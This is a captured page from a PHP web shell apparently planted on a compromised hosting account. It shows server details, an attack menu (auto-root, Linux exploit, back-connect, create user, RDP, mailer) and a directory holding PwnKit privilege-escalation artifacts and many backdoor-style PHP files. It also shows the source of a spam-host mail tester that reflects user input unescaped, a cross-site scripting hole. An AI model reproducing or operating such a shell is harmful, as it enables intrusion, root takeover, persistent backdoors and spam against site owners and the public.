Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
??? /
[ HOME SHELL ]
Name
Size
Permission
Action
-----GCONV_PATH=.
[ DIR ]
drwxr-xr-x
-----configFEW
[ DIR ]
drwxr-xr-x
----..pkexec
[ DIR ]
drwxr-xr-x
---+---test1.PhP7
466
B
-rw-r--r--
---+--test1.php
466
B
-rw-r--r--
----+---x.php
64.48
KB
-rw-r--r--
-------RDR.html
946
B
-rw-r--r--
-----bs2.PhP7
144.98
KB
-rw-r--r--
-----email.php
832
B
-rw-r--r--
-----pwnkit
10.99
KB
-rwxr-xr-x
-----rcc.PHP
34.16
KB
-rw-r--r--
-----test.php
1.1
KB
-rw-r--r--
-----x.PhP7
64.48
KB
-rw-r--r--
----bs2.php
144.98
KB
-rw-r--r--
----bu2.PhP7
136.81
KB
-rw-r--r--
----bu2.php
136.81
KB
-rw-r--r--
----efumwtjo.php
14.69
KB
-rw-r--r--
----m.PhP7
104.72
KB
-rw-r--r--
----m.php
104.72
KB
-rw-r--r--
----net.html
241
B
-rw-r--r--
----nsts2.PhP7
247.99
KB
-rw-r--r--
----nsts2.php
247.99
KB
-rw-r--r--
----prosellers2.PhP7
114.41
KB
-rw-r--r--
----prosellers2.php
114.41
KB
-rw-r--r--
----rc.php
34.16
KB
-rw-r--r--
----rcs2.PhP7
34.16
KB
-rw-r--r--
---.mad-root
0
B
-rw-r--r--
---index.php
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : -----email.php
<?php error_reporting(0); echo '<head> <title>Smart Tools Shop - Email sending tester</title> </head> <body><b><color>Smart Tools Shop - Email sending tester</color></b><br>Write your email and click on send email test<br> <form method="post"> <input type="email" name="email" style="background-color:whitesmoke;border:1px solid #FFF;outline:none;" required="" placeholder="username@domain.tld" value="' . $_POST['email'] . '"> <input type="submit" name="send" value="Send Email Test" style="border:none;background-color: #65d05e;color:#fff;cursor:pointer;"> </form> <br> </body>'; if (isset($_POST['email'])) { $rnd = rand(); mail($_POST['email'],"Email Sending Test Report ID: " . $rnd ,"WORKING!"); print "<font color=orange><b>Email Sent To: " . $_POST['email'] . ", Report ID: " . $rnd . "</b></font>"; }
Close